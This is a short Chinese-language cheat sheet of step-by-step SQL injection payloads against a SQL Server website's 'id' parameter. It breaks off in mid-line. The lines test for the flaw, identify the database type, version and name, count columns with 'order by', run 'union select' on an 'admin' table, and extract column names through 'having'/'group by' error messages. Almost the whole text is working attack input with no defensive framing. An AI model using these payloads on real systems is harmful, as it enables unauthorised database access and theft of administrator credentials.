例如
从上往下一直走-->(下面的纯手打,注意中英文符号)
id=1-1 and 1=1是否存在漏洞
id=1-1 and exists(select * from sysobjects) --判断数据库类型,这个是判断sqlserver数据库的
id=1-1 and (select @@version)>0 --判断数据库的版本
id=1-1 and (select db_name()) --判断数据库名称
id=1-1 order by 1/....../10.... --判断字段有多少 报错(超出xxx个字段)
id=1-1 union select 1,2,3,4,..... from admin --表的行字段 (几个字段就写到几)
id=1-1 having 1=1 -- 列的id列第一列名称
id=1 group by admin.id having 1=1 --列的第二个字段名称
id=1 group by admin.id,admin.context having 1=1 --列的第三个字段名称 (都报错出现admin.xxx无效)
id=1 group by admin.id,admin.context,admin.username having 1&